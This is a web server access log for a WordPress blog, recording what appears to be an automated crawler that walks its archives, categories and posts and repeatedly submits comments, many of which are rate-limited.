192.42.116.180 - - [29/Mar/2025:20:16:23 -0400] "GET /2024/07 HTTP/1.1" 301 0 "https://grimslut.com/2024/07" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
192.42.116.180 - - [29/Mar/2025:20:16:23 -0400] "GET /2024/07/ HTTP/1.1" 200 13110 "https://grimslut.com/2024/07" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
192.42.116.180 - - [29/Mar/2025:20:16:24 -0400] "GET /2024/08 HTTP/1.1" 301 0 "https://grimslut.com/2024/08" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
192.42.116.180 - - [29/Mar/2025:20:16:25 -0400] "GET /2024/08/ HTTP/1.1" 200 14895 "https://grimslut.com/2024/08" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
185.220.100.243 - - [29/Mar/2025:20:16:27 -0400] "GET /2024/09 HTTP/1.1" 301 0 "https://grimslut.com/2024/09" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
185.220.100.243 - - [29/Mar/2025:20:16:27 -0400] "GET /2024/09/ HTTP/1.1" 200 15014 "https://grimslut.com/2024/09" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
185.220.100.243 - - [29/Mar/2025:20:16:29 -0400] "GET /2024/10 HTTP/1.1" 301 0 "https://grimslut.com/2024/10" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
185.220.100.243 - - [29/Mar/2025:20:16:29 -0400] "GET /2024/10/ HTTP/1.1" 200 14787 "https://grimslut.com/2024/10" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
103.251.167.20 - - [29/Mar/2025:20:16:37 -0400] "GET /2024/11 HTTP/1.1" 301 0 "https://grimslut.com/2024/11" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
103.251.167.20 - - [29/Mar/2025:20:16:37 -0400] "GET /2024/11/ HTTP/1.1" 200 14948 "https://grimslut.com/2024/11" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
103.251.167.20 - - [29/Mar/2025:20:16:39 -0400] "GET /2024/12 HTTP/1.1" 301 0 "https://grimslut.com/2024/12" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
103.251.167.20 - - [29/Mar/2025:20:16:39 -0400] "GET /2024/12/ HTTP/1.1" 200 15085 "https://grimslut.com/2024/12" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
103.251.167.20 - - [29/Mar/2025:20:16:40 -0400] "GET /2025/01 HTTP/1.1" 301 0 "https://grimslut.com/2025/01" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
103.251.167.20 - - [29/Mar/2025:20:16:40 -0400] "GET /2025/01/ HTTP/1.1" 200 14800 "https://grimslut.com/2025/01" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
103.251.167.20 - - [29/Mar/2025:20:16:41 -0400] "GET /a-celebration-of-freedom HTTP/1.1" 301 0 "https://grimslut.com/a-celebration-of-freedom" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
103.251.167.20 - - [29/Mar/2025:20:16:42 -0400] "GET /a-celebration-of-freedom/ HTTP/1.1" 200 15366 "https://grimslut.com/a-celebration-of-freedom" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
198.54.114.83 - - [29/Mar/2025:20:16:44 -0400] "POST /wp-cron.php?doing_wp_cron=1743293804.5172109603881835937500 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://grimslut.com"
198.54.114.83 - - [29/Mar/2025:20:16:45 -0400] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=74GwZjjB5jBMAHNTjUZLOs1FR19K1UwS&litespeed_type=imgoptm HTTP/1.1" 200 5 "-" "WordPress/6.7.2; https://grimslut.com"
103.251.167.20 - - [29/Mar/2025:20:16:42 -0400] "POST /wp-comments-post.php HTTP/1.1" 302 0 "https://grimslut.com/wp-comments-post.php" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
103.251.167.20 - - [29/Mar/2025:20:16:45 -0400] "GET /a-celebration-of-freedom/ HTTP/1.1" 200 15366 "https://grimslut.com/wp-comments-post.php" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
103.251.167.20 - - [29/Mar/2025:20:16:46 -0400] "GET /a-path-to-healing-and-balance HTTP/1.1" 301 0 "https://grimslut.com/a-path-to-healing-and-balance" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
103.251.167.20 - - [29/Mar/2025:20:16:47 -0400] "GET /a-path-to-healing-and-balance/ HTTP/1.1" 200 15357 "https://grimslut.com/a-path-to-healing-and-balance" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
103.251.167.20 - - [29/Mar/2025:20:16:48 -0400] "POST /wp-comments-post.php HTTP/1.1" 429 983 "https://grimslut.com/wp-comments-post.php" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
192.42.116.194 - - [29/Mar/2025:20:16:49 -0400] "GET /a-premier-gaming-destination HTTP/1.1" 301 0 "https://grimslut.com/a-premier-gaming-destination" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
192.42.116.194 - - [29/Mar/2025:20:16:50 -0400] "GET /a-premier-gaming-destination/ HTTP/1.1" 200 15453 "https://grimslut.com/a-premier-gaming-destination" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
192.42.116.194 - - [29/Mar/2025:20:16:53 -0400] "POST /wp-comments-post.php HTTP/1.1" 429 983 "https://grimslut.com/wp-comments-post.php" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
192.42.116.194 - - [29/Mar/2025:20:16:54 -0400] "GET /a-premier-gaming-destination-2 HTTP/1.1" 301 0 "https://grimslut.com/a-premier-gaming-destination-2" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
192.42.116.194 - - [29/Mar/2025:20:16:55 -0400] "GET /a-premier-gaming-destination-2/ HTTP/1.1" 200 15384 "https://grimslut.com/a-premier-gaming-destination-2" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
192.42.116.194 - - [29/Mar/2025:20:16:56 -0400] "POST /wp-comments-post.php HTTP/1.1" 429 983 "https://grimslut.com/wp-comments-post.php" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
192.42.116.194 - - [29/Mar/2025:20:16:57 -0400] "GET /aba-therapy-for-kids-in-dubai HTTP/1.1" 301 0 "https://grimslut.com/aba-therapy-for-kids-in-dubai" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
192.42.116.194 - - [29/Mar/2025:20:16:57 -0400] "GET /aba-therapy-for-kids-in-dubai/ HTTP/1.1" 200 15415 "https://grimslut.com/aba-therapy-for-kids-in-dubai" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
192.42.116.194 - - [29/Mar/2025:20:16:59 -0400] "POST /wp-comments-post.php HTTP/1.1" 302 0 "https://grimslut.com/wp-comments-post.php" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
192.42.116.194 - - [29/Mar/2025:20:17:00 -0400] "GET /aba-therapy-for-kids-in-dubai/ HTTP/1.1" 200 15415 "https://grimslut.com/wp-comments-post.php" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
185.220.101.134 - - [29/Mar/2025:20:17:02 -0400] "GET /ai-agent-revolutionizing-digital-interactions HTTP/1.1" 301 0 "https://grimslut.com/ai-agent-revolutionizing-digital-interactions" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
185.220.101.134 - - [29/Mar/2025:20:17:03 -0400] "GET /ai-agent-revolutionizing-digital-interactions/ HTTP/1.1" 200 16159 "https://grimslut.com/ai-agent-revolutionizing-digital-interactions" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
185.220.101.155 - - [29/Mar/2025:20:17:06 -0400] "POST /wp-comments-post.php HTTP/1.1" 429 983 "https://grimslut.com/wp-comments-post.php" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
185.246.188.74 - - [29/Mar/2025:20:17:11 -0400] "GET /author/admin HTTP/1.1" 301 0 "https://grimslut.com/author/admin" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
185.246.188.74 - - [29/Mar/2025:20:17:11 -0400] "GET /author/admin/ HTTP/1.1" 200 14853 "https://grimslut.com/author/admin" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
185.246.188.74 - - [29/Mar/2025:20:17:12 -0400] "GET /business-trip-massage-for-a-productive-journey HTTP/1.1" 301 0 "https://grimslut.com/business-trip-massage-for-a-productive-journey" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
185.246.188.74 - - [29/Mar/2025:20:17:13 -0400] "GET /business-trip-massage-for-a-productive-journey/ HTTP/1.1" 200 15390 "https://grimslut.com/business-trip-massage-for-a-productive-journey" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
185.246.188.74 - - [29/Mar/2025:20:17:14 -0400] "POST /wp-comments-post.php HTTP/1.1" 302 0 "https://grimslut.com/wp-comments-post.php" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
185.246.188.74 - - [29/Mar/2025:20:17:15 -0400] "GET /business-trip-massage-for-a-productive-journey/ HTTP/1.1" 200 15390 "https://grimslut.com/wp-comments-post.php" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
185.246.188.74 - - [29/Mar/2025:20:17:16 -0400] "GET /business-tripe-massage HTTP/1.1" 301 0 "https://grimslut.com/business-tripe-massage" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
185.246.188.74 - - [29/Mar/2025:20:17:16 -0400] "GET /business-tripe-massage/ HTTP/1.1" 200 14991 "https://grimslut.com/business-tripe-massage" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
80.67.167.81 - - [29/Mar/2025:20:17:17 -0400] "POST /wp-comments-post.php HTTP/1.1" 429 983 "https://grimslut.com/wp-comments-post.php" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
80.67.167.81 - - [29/Mar/2025:20:17:19 -0400] "GET /business-trips-massage HTTP/1.1" 301 0 "https://grimslut.com/business-trips-massage" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
80.67.167.81 - - [29/Mar/2025:20:17:19 -0400] "GET /business-trips-massage/ HTTP/1.1" 200 14808 "https://grimslut.com/business-trips-massage" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
80.67.167.81 - - [29/Mar/2025:20:17:20 -0400] "POST /wp-comments-post.php HTTP/1.1" 429 983 "https://grimslut.com/wp-comments-post.php" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
80.67.167.81 - - [29/Mar/2025:20:17:21 -0400] "GET /category/arts-entertainments HTTP/1.1" 301 0 "https://grimslut.com/category/arts-entertainments" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
80.67.167.81 - - [29/Mar/2025:20:17:21 -0400] "GET /category/arts-entertainments/ HTTP/1.1" 200 14763 "https://grimslut.com/category/arts-entertainments" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
80.67.167.81 - - [29/Mar/2025:20:17:23 -0400] "GET /category/automotive HTTP/1.1" 301 0 "https://grimslut.com/category/automotive" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
80.67.167.81 - - [29/Mar/2025:20:17:24 -0400] "GET /category/automotive/ HTTP/1.1" 200 12189 "https://grimslut.com/category/automotive" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
80.67.167.81 - - [29/Mar/2025:20:17:25 -0400] "GET /category/beauty HTTP/1.1" 301 0 "https://grimslut.com/category/beauty" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
80.67.167.81 - - [29/Mar/2025:20:17:25 -0400] "GET /category/beauty/ HTTP/1.1" 200 12180 "https://grimslut.com/category/beauty" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
80.67.167.81 - - [29/Mar/2025:20:17:26 -0400] "GET /category/bitcoin HTTP/1.1" 301 0 "https://grimslut.com/category/bitcoin" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
80.67.167.81 - - [29/Mar/2025:20:17:26 -0400] "GET /category/bitcoin/ HTTP/1.1" 200 12187 "https://grimslut.com/category/bitcoin" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
45.66.35.22 - - [29/Mar/2025:20:17:28 -0400] "GET /category/business HTTP/1.1" 301 0 "https://grimslut.com/category/business" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
45.66.35.22 - - [29/Mar/2025:20:17:28 -0400] "GET /category/business/ HTTP/1.1" 200 12207 "https://grimslut.com/category/business" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
45.66.35.22 - - [29/Mar/2025:20:17:29 -0400] "GET /category/digital-marketing HTTP/1.1" 301 0 "https://grimslut.com/category/digital-marketing" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
45.66.35.22 - - [29/Mar/2025:20:17:30 -0400] "GET /category/digital-marketing/ HTTP/1.1" 200 12147 "https://grimslut.com/category/digital-marketing" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
45.66.35.22 - - [29/Mar/2025:20:17:31 -0400] "GET /category/education HTTP/1.1" 301 0 "https://grimslut.com/category/education" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
45.66.35.22 - - [29/Mar/2025:20:17:31 -0400] "GET /category/education/ HTTP/1.1" 200 12211 "https://grimslut.com/category/education" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
45.66.35.22 - - [29/Mar/2025:20:17:33 -0400] "GET /category/family-relationship HTTP/1.1" 301 0 "https://grimslut.com/category/family-relationship" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
45.66.35.22 - - [29/Mar/2025:20:17:33 -0400] "GET /category/family-relationship/ HTTP/1.1" 200 12153 "https://grimslut.com/category/family-relationship" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
45.66.35.22 - - [29/Mar/2025:20:17:35 -0400] "GET /category/food-dring HTTP/1.1" 301 0 "https://grimslut.com/category/food-dring" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
45.66.35.22 - - [29/Mar/2025:20:17:35 -0400] "GET /category/food-dring/ HTTP/1.1" 200 12271 "https://grimslut.com/category/food-dring" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
45.66.35.22 - - [29/Mar/2025:20:17:36 -0400] "GET /category/gaming HTTP/1.1" 301 0 "https://grimslut.com/category/gaming" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
45.66.35.22 - - [29/Mar/2025:20:17:37 -0400] "GET /category/gaming/ HTTP/1.1" 200 12240 "https://grimslut.com/category/gaming" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
45.66.35.22 - - [29/Mar/2025:20:17:37 -0400] "GET /category/general HTTP/1.1" 301 0 "https://grimslut.com/category/general" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
45.66.35.22 - - [29/Mar/2025:20:17:38 -0400] "GET /category/general/ HTTP/1.1" 200 12180 "https://grimslut.com/category/general" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
45.95.169.104 - - [29/Mar/2025:20:17:39 -0400] "GET /category/health-fitness HTTP/1.1" 301 0 "https://grimslut.com/category/health-fitness" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
45.95.169.104 - - [29/Mar/2025:20:17:40 -0400] "GET /category/health-fitness/ HTTP/1.1" 200 13264 "https://grimslut.com/category/health-fitness" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
45.95.169.104 - - [29/Mar/2025:20:17:41 -0400] "GET /category/home-improvement HTTP/1.1" 301 0 "https://grimslut.com/category/home-improvement" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
45.95.169.104 - - [29/Mar/2025:20:17:41 -0400] "GET /category/home-improvement/ HTTP/1.1" 200 12158 "https://grimslut.com/category/home-improvement" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
45.95.169.104 - - [29/Mar/2025:20:17:43 -0400] "GET /category/home-kitchen HTTP/1.1" 301 0 "https://grimslut.com/category/home-kitchen" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
45.95.169.104 - - [29/Mar/2025:20:17:43 -0400] "GET /category/home-kitchen/ HTTP/1.1" 200 12173 "https://grimslut.com/category/home-kitchen" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
45.95.169.104 - - [29/Mar/2025:20:17:44 -0400] "GET /category/how-to HTTP/1.1" 301 0 "https://grimslut.com/category/how-to" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
45.95.169.104 - - [29/Mar/2025:20:17:45 -0400] "GET /category/how-to/ HTTP/1.1" 200 13540 "https://grimslut.com/category/how-to" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
45.95.169.104 - - [29/Mar/2025:20:17:46 -0400] "GET /category/legal-law HTTP/1.1" 301 0 "https://grimslut.com/category/legal-law" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
45.95.169.104 - - [29/Mar/2025:20:17:47 -0400] "GET /category/legal-law/ HTTP/1.1" 200 12158 "https://grimslut.com/category/legal-law" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
45.95.169.104 - - [29/Mar/2025:20:17:48 -0400] "GET /category/lifestyle-fashion HTTP/1.1" 301 0 "https://grimslut.com/category/lifestyle-fashion" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
45.95.169.104 - - [29/Mar/2025:20:17:48 -0400] "GET /category/lifestyle-fashion/ HTTP/1.1" 200 12202 "https://grimslut.com/category/lifestyle-fashion" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
45.95.169.104 - - [29/Mar/2025:20:17:49 -0400] "GET /category/media-music HTTP/1.1" 301 0 "https://grimslut.com/category/media-music" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
45.95.169.104 - - [29/Mar/2025:20:17:50 -0400] "GET /category/media-music/ HTTP/1.1" 200 12156 "https://grimslut.com/category/media-music" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
45.95.169.104 - - [29/Mar/2025:20:17:50 -0400] "GET /category/others HTTP/1.1" 301 0 "https://grimslut.com/category/others" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
45.95.169.104 - - [29/Mar/2025:20:17:51 -0400] "GET /category/others/ HTTP/1.1" 200 12175 "https://grimslut.com/category/others" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
45.95.169.104 - - [29/Mar/2025:20:17:52 -0400] "GET /category/pets HTTP/1.1" 301 0 "https://grimslut.com/category/pets" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
45.95.169.104 - - [29/Mar/2025:20:17:52 -0400] "GET /category/pets/ HTTP/1.1" 200 12205 "https://grimslut.com/category/pets" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
45.95.169.104 - - [29/Mar/2025:20:17:53 -0400] "GET /category/real-estate HTTP/1.1" 301 0 "https://grimslut.com/category/real-estate" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
45.95.169.104 - - [29/Mar/2025:20:17:54 -0400] "GET /category/real-estate/ HTTP/1.1" 200 12220 "https://grimslut.com/category/real-estate" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
45.95.169.104 - - [29/Mar/2025:20:17:55 -0400] "GET /category/shopping-product-reviews HTTP/1.1" 301 0 "https://grimslut.com/category/shopping-product-reviews" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
45.95.169.104 - - [29/Mar/2025:20:17:56 -0400] "GET /category/shopping-product-reviews/ HTTP/1.1" 200 12145 "https://grimslut.com/category/shopping-product-reviews" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
192.42.116.196 - - [29/Mar/2025:20:17:57 -0400] "GET /category/sports HTTP/1.1" 301 0 "https://grimslut.com/category/sports" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
192.42.116.196 - - [29/Mar/2025:20:17:57 -0400] "GET /category/sports/ HTTP/1.1" 200 12176 "https://grimslut.com/category/sports" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
192.42.116.196 - - [29/Mar/2025:20:17:58 -0400] "GET /category/stock-trading HTTP/1.1" 301 0 "https://grimslut.com/category/stock-trading" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
192.42.116.196 - - [29/Mar/2025:20:17:59 -0400] "GET /category/stock-trading/ HTTP/1.1" 200 12197 "https://grimslut.com/category/stock-trading" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
192.42.116.196 - - [29/Mar/2025:20:18:00 -0400] "GET /category/technology HTTP/1.1" 301 0 "https://grimslut.com/category/technology" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
192.42.116.196 - - [29/Mar/2025:20:18:00 -0400] "GET /category/technology/ HTTP/1.1" 200 12164 "https://grimslut.com/category/technology" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
192.42.116.196 - - [29/Mar/2025:20:18:02 -0400] "GET /category/travel-tours HTTP/1.1" 301 0 "https://grimslut.com/category/travel-tours" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
192.42.116.196 - - [29/Mar/2025:20:18:05 -0400] "GET /category/travel-tours/ HTTP/1.1" 200 12188 "https://grimslut.com/category/travel-tours" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
185.220.100.252 - - [29/Mar/2025:20:18:08 -0400] "GET /charming-and-versatile-shell-earrings HTTP/1.1" 301 0 "https://grimslut.com/charming-and-versatile-shell-earrings" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
185.220.100.252 - - [29/Mar/2025:20:18:08 -0400] "GET /charming-and-versatile-shell-earrings/ HTTP/1.1" 200 15927 "https://grimslut.com/charming-and-versatile-shell-earrings" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
198.54.114.83 - - [29/Mar/2025:20:18:09 -0400] "POST /wp-cron.php?doing_wp_cron=1743293889.6489610671997070312500 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://grimslut.com"
198.54.114.83 - - [29/Mar/2025:20:18:10 -0400] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=C3BNHNGZqhsU9lj27tl9HowsTWliycwJ&litespeed_type=imgoptm HTTP/1.1" 200 5 "-" "WordPress/6.7.2; https://grimslut.com"
185.220.100.252 - - [29/Mar/2025:20:18:09 -0400] "POST /wp-comments-post.php HTTP/1.1" 302 0 "https://grimslut.com/wp-comments-post.php" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
185.220.100.252 - - [29/Mar/2025:20:18:10 -0400] "GET /charming-and-versatile-shell-earrings/ HTTP/1.1" 200 15927 "https://grimslut.com/wp-comments-post.php" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
185.220.101.26 - - [29/Mar/2025:20:18:11 -0400] "GET /charming-properties-in-southern-spain-await-your-move HTTP/1.1" 301 0 "https://grimslut.com/charming-properties-in-southern-spain-await-your-move" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
185.220.101.26 - - [29/Mar/2025:20:18:12 -0400] "GET /charming-properties-in-southern-spain-await-your-move/ HTTP/1.1" 200 16036 "https://grimslut.com/charming-properties-in-southern-spain-await-your-move" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
185.220.101.26 - - [29/Mar/2025:20:18:12 -0400] "POST /wp-comments-post.php HTTP/1.1" 429 983 "https://grimslut.com/wp-comments-post.php" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
185.220.101.26 - - [29/Mar/2025:20:18:13 -0400] "GET /choosing-the-right-massage-services HTTP/1.1" 301 0 "https://grimslut.com/choosing-the-right-massage-services" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
185.220.101.26 - - [29/Mar/2025:20:18:14 -0400] "GET /choosing-the-right-massage-services/ HTTP/1.1" 200 15431 "https://grimslut.com/choosing-the-right-massage-services" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
185.220.101.26 - - [29/Mar/2025:20:18:15 -0400] "POST /wp-comments-post.php HTTP/1.1" 429 983 "https://grimslut.com/wp-comments-post.php" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
185.220.101.26 - - [29/Mar/2025:20:18:16 -0400] "GET /comments/feed HTTP/1.1" 301 0 "https://grimslut.com/comments/feed" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
185.220.101.26 - - [29/Mar/2025:20:18:16 -0400] "GET /comments/feed/ HTTP/1.1" 200 364 "https://grimslut.com/comments/feed" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
185.220.101.26 - - [29/Mar/2025:20:18:17 -0400] "GET /communication-in-real-estate-with-answering-services HTTP/1.1" 301 0 "https://grimslut.com/communication-in-real-estate-with-answering-services" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
185.220.101.26 - - [29/Mar/2025:20:18:17 -0400] "GET /communication-in-real-estate-with-answering-services/ HTTP/1.1" 200 16022 "https://grimslut.com/communication-in-real-estate-with-answering-services" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
